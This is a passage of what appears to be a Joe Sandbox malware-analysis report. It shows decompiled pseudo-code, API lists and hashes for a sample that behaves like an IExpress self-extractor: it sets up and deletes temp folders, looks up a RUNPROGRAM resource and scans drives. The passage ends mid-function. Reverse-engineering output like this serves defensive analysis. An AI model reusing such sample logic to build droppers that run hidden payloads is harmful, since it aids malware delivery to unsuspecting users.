                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 00382F93
                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00382FB2
                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00382FC6
                                                • DecryptFileA.ADVAPI32 ref: 00382FE6
                                                • FreeLibrary.KERNEL32(00000000), ref: 00382FF8
                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038301C
                                                  • Part of subcall function 003851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F4D,?,00000002,00000000), ref: 00385201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                • API String ID: 2126469477-3123416969
                                                • Opcode ID: 40693dfcccb81e0f5ce92a6ad5051b7ec0d04a57cac2084af7d2a2953fa9102c
                                                • Instruction ID: 6f21a0a8899c1e91539bd4187f23665edd6f9378f899a561c73ce8090ea6b3da
                                                • Opcode Fuzzy Hash: 40693dfcccb81e0f5ce92a6ad5051b7ec0d04a57cac2084af7d2a2953fa9102c
                                                • Instruction Fuzzy Hash: E941B5B0A007059BDB37BB71AC4976A33ACAB44F55F1505E6E942C6291EF78CF80CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 522 385467-385484 523 38548a-385490 call 3853a1 522->523 524 38551c-385528 call 381680 522->524 527 385495-385497 523->527 528 38552d-385539 call 3858c8 524->528 529 38549d-3854c0 call 381781 527->529 530 385581-385583 527->530 537 38553b-385545 CreateDirectoryA 528->537 538 38554d-385552 528->538 539 38550c-38551a call 38658a 529->539 540 3854c2-3854d8 GetSystemInfo 529->540 533 38558d-38559d call 386ce0 530->533 542 385577-38557c call 386285 537->542 543 385547 537->543 544 385554-385557 call 38597d 538->544 545 385585-38558b 538->545 539->528 549 3854da-3854dd 540->549 550 3854fe 540->550 542->530 543->538 551 38555c-38555e 544->551 545->533 555 3854df-3854e2 549->555 556 3854f7-3854fc 549->556 552 385503-385507 call 38658a 550->552 551->545 557 385560-385566 551->557 552->539 559 3854f0-3854f5 555->559 560 3854e4-3854e7 555->560 556->552 557->530 561 385568-385575 RemoveDirectoryA 557->561 559->552 560->539 562 3854e9-3854ee 560->562 561->530 562->552
                                                C-Code - Quality: 75%
                                                			E00385467(CHAR* __ecx, void* __edx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _SYSTEM_INFO _v304;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t10;
                                                				void* _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t20;
                                                				signed int _t26;
                                                				void* _t28;
                                                				void* _t29;
                                                				CHAR* _t48;
                                                				signed int _t49;
                                                				intOrPtr _t61;
                                                
                                                				_t10 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t10 ^ _t49;
                                                				_push(__ecx);
                                                				if(__edx == 0) {
                                                					_t48 = 0x3891e4;
                                                					_t42 = 0x104;
                                                					E00381680(0x3891e4, 0x104);
                                                					L14:
                                                					_t13 = E003858C8(_t48); // executed
                                                					if(_t13 != 0) {
                                                						L17:
                                                						_t42 = _a4;
                                                						if(_a4 == 0) {
                                                							L23:
                                                							 *0x389124 = 0;
                                                							_t14 = 1;
                                                							L24:
                                                							return E00386CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                						}
                                                						_t16 = E0038597D(_t48, _t42, 1, 0); // executed
                                                						if(_t16 != 0) {
                                                							goto L23;
                                                						}
                                                						_t61 =  *0x388a20; // 0x0
                                                						if(_t61 != 0) {
                                                							 *0x388a20 = 0;
                                                							RemoveDirectoryA(_t48);
                                                						}
                                                						L22:
                                                						_t14 = 0;
                                                						goto L24;
                                                					}
                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                						 *0x389124 = E00386285();
                                                						goto L22;
                                                					}
                                                					 *0x388a20 = 1;
                                                					goto L17;
                                                				}
                                                				_t42 =  &_v268;
                                                				_t20 = E003853A1(__ecx,  &_v268); // executed
                                                				if(_t20 == 0) {
                                                					goto L22;
                                                				}
                                                				_push(__ecx);
                                                				_t48 = 0x3891e4;
                                                				E00381781(0x3891e4, 0x104, __ecx,  &_v268);
                                                				if(( *0x389a34 & 0x00000020) == 0) {
                                                					L12:
                                                					_t42 = 0x104;
                                                					E0038658A(_t48, 0x104, 0x381140);
                                                					goto L14;
                                                				}
                                                				GetSystemInfo( &_v304);
                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                				if(_t26 == 0) {
                                                					_push("i386");
                                                					L11:
                                                					E0038658A(_t48, 0x104);
                                                					goto L12;
                                                				}
                                                				_t28 = _t26 - 1;
                                                				if(_t28 == 0) {
                                                					_push("mips");
                                                					goto L11;
                                                				}
                                                				_t29 = _t28 - 1;
                                                				if(_t29 == 0) {
                                                					_push("alpha");
                                                					goto L11;
                                                				}
                                                				if(_t29 != 1) {
                                                					goto L12;
                                                				}
                                                				_push("ppc");
                                                				goto L11;
                                                			}




















                                                0x00385472
                                                0x00385479
                                                0x00385481
                                                0x00385484
                                                0x0038551c
                                                0x00385521
                                                0x00385528
                                                0x0038552d
                                                0x0038552f
                                                0x00385539
                                                0x0038554d
                                                0x0038554d
                                                0x00385552
                                                0x00385585
                                                0x00385585
                                                0x0038558b
                                                0x0038558d
                                                0x0038559d
                                                0x0038559d
                                                0x00385557
                                                0x0038555e
                                                0x00000000
                                                0x00000000
                                                0x00385560
                                                0x00385566
                                                0x00385569
                                                0x0038556f
                                                0x0038556f
                                                0x00385581
                                                0x00385581
                                                0x00000000
                                                0x00385581
                                                0x00385545
                                                0x0038557c
                                                0x00000000
                                                0x0038557c
                                                0x00385547
                                                0x00000000
                                                0x00385547
                                                0x0038548a
                                                0x00385490
                                                0x00385497
                                                0x00000000
                                                0x00000000
                                                0x0038549d
                                                0x003854ab
                                                0x003854b4
                                                0x003854c0
                                                0x0038550c
                                                0x00385511
                                                0x00385515
                                                0x00000000
                                                0x00385515
                                                0x003854c9
                                                0x003854d6
                                                0x003854d8
                                                0x003854fe
                                                0x00385503
                                                0x00385507
                                                0x00000000
                                                0x00385507
                                                0x003854da
                                                0x003854dd
                                                0x003854f7
                                                0x00000000
                                                0x003854f7
                                                0x003854df
                                                0x003854e2
                                                0x003854f0
                                                0x00000000
                                                0x003854f0
                                                0x003854e7
                                                0x00000000
                                                0x00000000
                                                0x003854e9
                                                0x00000000

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003854C9
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038553D
                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038556F
                                                  • Part of subcall function 003853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003853FB
                                                  • Part of subcall function 003853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385402
                                                  • Part of subcall function 003853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038541F
                                                  • Part of subcall function 003853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038542B
                                                  • Part of subcall function 003853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385434
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                • API String ID: 1979080616-3703068183
                                                • Opcode ID: 4bb639eeb91f6d23b9471fa6ba9d7d8820c9963e774ecb79861c44242301aa23
                                                • Instruction ID: 665bfe8cd5f421a7fa8eb7a148bd1280fb2fa24ceaf09a06aa1a57cc278bc195
                                                • Opcode Fuzzy Hash: 4bb639eeb91f6d23b9471fa6ba9d7d8820c9963e774ecb79861c44242301aa23
                                                • Instruction Fuzzy Hash: 5231C571B00B055BCB17BB3A9C45ABF779EAB82740F1501EAE803D6590DBB48E428795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 86%
                                                			E00382390(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v280;
                                                				char _v284;
                                                				struct _WIN32_FIND_DATAA _v596;
                                                				struct _WIN32_FIND_DATAA _v604;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				int _t36;
                                                				void* _t46;
                                                				void* _t62;
                                                				void* _t63;
                                                				CHAR* _t65;
                                                				void* _t66;
                                                				signed int _t67;
                                                				signed int _t69;
                                                
                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                				_t21 =  *0x388004; // 0xb25159a8
                                                				_t22 = _t21 ^ _t69;
                                                				_v8 = _t21 ^ _t69;
                                                				_t65 = __ecx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                					L10:
                                                					_pop(_t62);
                                                					_pop(_t66);
                                                					_pop(_t46);
                                                					return E00386CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                				} else {
                                                					E00381680( &_v276, 0x104, __ecx);
                                                					_t58 = 0x104;
                                                					E003816B3( &_v280, 0x104, "*");
                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                					_t63 = _t22;
                                                					if(_t63 == 0xffffffff) {
                                                						goto L10;
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t58 = 0x104;
                                                						E00381680( &_v276, 0x104, _t65);
                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                							_t58 = 0x104;
                                                							E003816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                							SetFileAttributesA( &_v280, 0x80);
                                                							DeleteFileA( &_v280);
                                                						} else {
                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                								E003816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                								_t58 = 0x104;
                                                								E0038658A( &_v280, 0x104, 0x381140);
                                                								E00382390( &_v284);
                                                							}
                                                						}
                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                					} while (_t36 != 0);
                                                					FindClose(_t63); // executed
                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                					goto L10;
                                                				}
                                                			}





















                                                0x00382398
                                                0x0038239e
                                                0x003823a3
                                                0x003823a5
                                                0x003823ae
                                                0x003823b3
                                                0x003824cb
                                                0x003824d2
                                                0x003824d3
                                                0x003824d4
                                                0x003824df
                                                0x003823c2
                                                0x003823d1
                                                0x003823db
                                                0x003823e4
                                                0x003823f6
                                                0x003823fc
                                                0x00382401
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00382407
                                                0x00382407
                                                0x00382408
                                                0x00382411
                                                0x0038241f
                                                0x0038247a
                                                0x00382483
                                                0x00382495
                                                0x003824a3
                                                0x00382421
                                                0x0038242f
                                                0x00382453
                                                0x0038245d
                                                0x00382466
                                                0x00382472
                                                0x00382472
                                                0x0038242f
                                                0x003824af
                                                0x003824b5
                                                0x003824be
                                                0x003824c5
                                                0x00000000
                                                0x003824c5

                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,00388A3A,003811F4,00388A3A,00000000,?,?), ref: 003823F6
                                                • lstrcmpA.KERNEL32(?,003811F8), ref: 00382427
                                                • lstrcmpA.KERNEL32(?,003811FC), ref: 0038243B
                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00382495
                                                • DeleteFileA.KERNEL32(?), ref: 003824A3
                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003824AF
                                                • FindClose.KERNELBASE(00000000), ref: 003824BE
                                                • RemoveDirectoryA.KERNELBASE(00388A3A), ref: 003824C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                • String ID:
                                                • API String ID: 836429354-0
                                                • Opcode ID: 172b1a0b9d0a3581f8a32aa6cc20bc213a54670d79d66e792910e7816bd9fa4e
                                                • Instruction ID: 361d8e4b6ba8cc339daac486707a5103713f407efcf4cdeb3cf04e2a4f595682
                                                • Opcode Fuzzy Hash: 172b1a0b9d0a3581f8a32aa6cc20bc213a54670d79d66e792910e7816bd9fa4e
                                                • Instruction Fuzzy Hash: 2931A471204740ABD322FB64CC8DAEB73ACABC4305F0449AEF99587190EB74990DC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00382BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long _t4;
                                                				void* _t6;
                                                				intOrPtr _t7;
                                                				void* _t9;
                                                				struct HINSTANCE__* _t12;
                                                				intOrPtr* _t17;
                                                				signed char _t19;
                                                				intOrPtr* _t21;
                                                				void* _t22;
                                                				void* _t24;
                                                				intOrPtr _t32;
                                                
                                                				_t4 = GetVersion();
                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                					if(_t12 != 0) {
                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                						if(_t21 != 0) {
                                                							_t17 = _t21;
                                                							 *0x38a288(0, 1, 0, 0);
                                                							 *_t21();
                                                							_t29 = _t24 - _t24;
                                                							if(_t24 != _t24) {
                                                								_t17 = 4;
                                                								asm("int 0x29");
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t20 = _a12;
                                                				_t18 = _a4;
                                                				 *0x389124 = 0;
                                                				if(E00382CAA(_a4, _a12, _t29, _t17) != 0) {
                                                					_t9 = E00382F1D(_t18, _t20); // executed
                                                					_t22 = _t9; // executed
                                                					E003852B6(0, _t18, _t21, _t22); // executed
                                                					if(_t22 != 0) {
                                                						_t32 =  *0x388a3a; // 0x0
                                                						if(_t32 == 0) {
                                                							_t19 =  *0x389a2c; // 0x0
                                                							if((_t19 & 0x00000001) != 0) {
                                                								E00381F90(_t19, _t21, _t22);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t6 =  *0x388588; // 0x0
                                                				if(_t6 != 0) {
                                                					CloseHandle(_t6);
                                                				}
                                                				_t7 =  *0x389124; // 0x80070002
                                                				return _t7;
                                                			}


















                                                0x00382c03
                                                0x00382c0d
                                                0x00382c18
                                                0x00382c20
                                                0x00382c2e
                                                0x00382c32
                                                0x00382c36
                                                0x00382c3d
                                                0x00382c43
                                                0x00382c45
                                                0x00382c47
                                                0x00382c49
                                                0x00382c4e
                                                0x00382c4e
                                                0x00382c47
                                                0x00382c32
                                                0x00382c20
                                                0x00382c50
                                                0x00382c54
                                                0x00382c57
                                                0x00382c64
                                                0x00382c66
                                                0x00382c6b
                                                0x00382c6d
                                                0x00382c74
                                                0x00382c76
                                                0x00382c7c
                                                0x00382c7e
                                                0x00382c87
                                                0x00382c89
                                                0x00382c89
                                                0x00382c87
                                                0x00382c7c
                                                0x00382c74
                                                0x00382c8e
                                                0x00382c95
                                                0x00382c98
                                                0x00382c98
                                                0x00382c9e
                                                0x00382ca7

                                                APIs
                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C03
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C18
                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00382C28
                                                • CloseHandle.KERNEL32(00000000,?,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                • String ID: HeapSetInformation$Kernel32.dll
                                                • API String ID: 62482547-3460614246
                                                • Opcode ID: 2303df09250181af287888fa4fd773e42855fc39d2083e076f7dbc2a0b0cbfc9
                                                • Instruction ID: 1eba7d0cd5950e799f6c3a666cf519ff0e6ac9a79383dde8b4fa242388dadbb9
                                                • Opcode Fuzzy Hash: 2303df09250181af287888fa4fd773e42855fc39d2083e076f7dbc2a0b0cbfc9
                                                • Instruction Fuzzy Hash: 8611AC71200705ABE7237BB5AD88A7F37BDAB88790F4A04D6F901D7290DA24DC028761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00386F40() {
                                                
                                                				SetUnhandledExceptionFilter(E00386EF0); // executed
                                                				return 0;
                                                			}



                                                0x00386f45
                                                0x00386f4d

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00386F45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: d66b9449cf29420fd5f527abef9c913fa05ca65963de5d5e026058ec91f7c4c7
                                                • Instruction ID: 0ca2e0f783ce027c975f92a50cf8cddb89832902a45cf6b5931b336b28a6e3d0
                                                • Opcode Fuzzy Hash: d66b9449cf29420fd5f527abef9c913fa05ca65963de5d5e026058ec91f7c4c7
                                                • Instruction Fuzzy Hash: FA90027425170047A6122B70DE1E45575995A4D743F8154E1E111C4498DB6050405712
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 3855a0-3855d9 call 38468f LocalAlloc 235 3855db-3855f1 call 3844b9 call 386285 232->235 236 3855fd-38560c call 38468f 232->236 248 3855f6-3855f8 235->248 242 38560e-385630 call 3844b9 LocalFree 236->242 243 385632-385643 lstrcmpA 236->243 242->248 246 38564b-385659 LocalFree 243->246 247 385645 243->247 250 38565b-38565d 246->250 251 385696-38569c 246->251 247->246 254 3858b7-3858c7 call 386ce0 248->254 252 385669 250->252 253 38565f-385667 250->253 255 38589f-3858b5 call 386517 251->255 256 3856a2-3856a8 251->256 257 38566b-38567a call 385467 252->257 253->252 253->257 255->254 256->255 260 3856ae-3856c1 GetTempPathA 256->260 269 38589b-38589d 257->269 270 385680-385691 call 3844b9 257->270 264 3856f3-385711 call 381781 260->264 265 3856c3-3856c9 call 385467 260->265 274 38586c-385890 GetWindowsDirectoryA call 38597d 264->274 275 385717-385729 GetDriveTypeA 264->275 272 3856ce-3856d0 265->272 269->254 270->248 272->269 276 3856d6-3856df call 382630 272->276 274->264 286 385896 274->286 278 38572b-38572e 275->278 279 385730-385740 GetFileAttributesA 275->279 276->264 287 3856e1-3856ed call 385467 276->287 278->279 284 385742-385745 278->284 279->284 285 38577e-38578f call 38597d 279->285 289 38576b 284->289 290 385747-38574f 284->290 297 385791-38579e call 382630 285->297 298 3857b2-3857bf call 382630 285->298 286->269 287->264 287->269 292 385771-385779 289->292 290->292 294 385751-385753 290->294 296 385864-385866 292->296 294->292 299 385755-385762 call 386952 294->299 296->274 296->275 297->289 307 3857a0-3857b0 call 38597d 297->307 308 3857c1-3857cd GetWindowsDirectoryA 298->308 309 3857d3-3857f8 call 38658a GetFileAttributesA 298->309 299->289 306 385764-385769 299->306 306->285 306->289 307->289 307->298 308->309 314 38580a 309->314 315 3857fa-385808 CreateDirectoryA 309->315 316 38580d-38580f 314->316 315->316 317 385811-385825 316->317 318 385827-38585c SetFileAttributesA call 381781 call 385467 316->318 317->296 318->269 323 38585e 318->323 323->296
                                                C-Code - Quality: 92%
                                                			E003855A0(void* __eflags) {
                                                				signed int _v8;
                                                				char _v265;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				int _t32;
                                                				int _t33;
                                                				int _t35;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				int _t40;
                                                				int _t44;
                                                				long _t48;
                                                				int _t49;
                                                				int _t50;
                                                				signed int _t53;
                                                				int _t54;
                                                				int _t59;
                                                				char _t60;
                                                				int _t65;
                                                				char _t66;
                                                				int _t67;
                                                				int _t68;
                                                				int _t69;
                                                				int _t70;
                                                				int _t71;
                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                				int _t73;
                                                				CHAR* _t82;
                                                				CHAR* _t88;
                                                				void* _t103;
                                                				signed int _t110;
                                                
                                                				_t28 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t28 ^ _t110;
                                                				_t2 = E0038468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                				_t109 = LocalAlloc(0x40, _t2);
                                                				if(_t109 != 0) {
                                                					_t82 = "RUNPROGRAM";
                                                					_t32 = E0038468F(_t82, _t109, 1);
                                                					__eflags = _t32;
                                                					if(_t32 != 0) {
                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                						__eflags = _t33;
                                                						if(_t33 == 0) {
                                                							 *0x389a30 = 1;
                                                						}
                                                						LocalFree(_t109);
                                                						_t35 =  *0x388b3e; // 0x0
                                                						__eflags = _t35;
                                                						if(_t35 == 0) {
                                                							__eflags =  *0x388a24; // 0x0
                                                							if(__eflags != 0) {
                                                								L46:
                                                								_t101 = 0x7d2;
                                                								_t36 = E00386517(_t82, 0x7d2, 0, E00383210, 0, 0);
                                                								asm("sbb eax, eax");
                                                								_t38 =  ~( ~_t36);
                                                							} else {
                                                								__eflags =  *0x389a30; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L46;
                                                								} else {
                                                									_t109 = 0x3891e4;
                                                									_t40 = GetTempPathA(0x104, 0x3891e4);
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L19:
                                                										_push(_t82);
                                                										E00381781( &_v268, 0x104, _t82, "A:\\");
                                                										__eflags = _v268 - 0x5a;
                                                										if(_v268 <= 0x5a) {
                                                											do {
                                                												_t109 = GetDriveTypeA( &_v268);
                                                												__eflags = _t109 - 6;
                                                												if(_t109 == 6) {
                                                													L22:
                                                													_t48 = GetFileAttributesA( &_v268);
                                                													__eflags = _t48 - 0xffffffff;
                                                													if(_t48 != 0xffffffff) {
                                                														goto L30;
                                                													} else {
                                                														goto L23;
                                                													}
                                                												} else {
                                                													__eflags = _t109 - 3;
                                                													if(_t109 != 3) {
                                                														L23:
                                                														__eflags = _t109 - 2;
                                                														if(_t109 != 2) {
                                                															L28:
                                                															_t66 = _v268;
                                                															goto L29;
                                                														} else {
                                                															_t66 = _v268;
                                                															__eflags = _t66 - 0x41;
                                                															if(_t66 == 0x41) {
                                                																L29:
                                                																_t60 = _t66 + 1;
                                                																_v268 = _t60;
                                                																goto L42;
                                                															} else {
                                                																__eflags = _t66 - 0x42;
                                                																if(_t66 == 0x42) {
                                                																	goto L29;
                                                																} else {
                                                																	_t68 = E00386952( &_v268);
                                                																	__eflags = _t68;
                                                																	if(_t68 == 0) {
                                                																		goto L28;
                                                																	} else {
                                                																		__eflags = _t68 - 0x19000;
                                                																		if(_t68 >= 0x19000) {
                                                																			L30:
                                                																			_push(0);
                                                																			_t103 = 3;
                                                																			_t49 = E0038597D( &_v268, _t103, 1);
                                                																			__eflags = _t49;
                                                																			if(_t49 != 0) {
                                                																				L33:
                                                																				_t50 = E00382630(0,  &_v268, 1);
                                                																				__eflags = _t50;
                                                																				if(_t50 != 0) {
                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                																				}
                                                																				_t88 =  &_v268;
                                                																				E0038658A(_t88, 0x104, "msdownld.tmp");
                                                																				_t53 = GetFileAttributesA( &_v268);
                                                																				__eflags = _t53 - 0xffffffff;
                                                																				if(_t53 != 0xffffffff) {
                                                																					_t54 = _t53 & 0x00000010;
                                                																					__eflags = _t54;
                                                																				} else {
                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                																				}
                                                																				__eflags = _t54;
                                                																				if(_t54 != 0) {
                                                																					SetFileAttributesA( &_v268, 2);
                                                																					_push(_t88);
                                                																					_t109 = 0x3891e4;
                                                																					E00381781(0x3891e4, 0x104, _t88,  &_v268);
                                                																					_t101 = 1;
                                                																					_t59 = E00385467(0x3891e4, 1, 0);
                                                																					__eflags = _t59;
                                                																					if(_t59 != 0) {
                                                																						goto L45;
                                                																					} else {
                                                																						_t60 = _v268;
                                                																						goto L42;
                                                																					}
                                                																				} else {
                                                																					_t60 = _v268 + 1;
                                                																					_v265 = 0;
                                                																					_v268 = _t60;
                                                																					goto L42;
                                                																				}
                                                																			} else {
                                                																				_t65 = E00382630(0,  &_v268, 1);
                                                																				__eflags = _t65;
                                                																				if(_t65 != 0) {
                                                																					goto L28;
                                                																				} else {
                                                																					_t67 = E0038597D( &_v268, 1, 1, 0);
                                                																					__eflags = _t67;
                                                																					if(_t67 == 0) {
                                                																						goto L28;
                                                																					} else {
                                                																						goto L33;
                                                																					}
                                                																				}
                                                																			}
                                                																		} else {
                                                																			goto L28;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														goto L22;
                                                													}
                                                												}
                                                												goto L47;
                                                												L42:
                                                												__eflags = _t60 - 0x5a;
                                                											} while (_t60 <= 0x5a);
                                                										}
                                                										goto L43;
                                                									} else {
                                                										_t101 = 1;
                                                										_t69 = E00385467(0x3891e4, 1, 3); // executed
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L45;
                                                										} else {
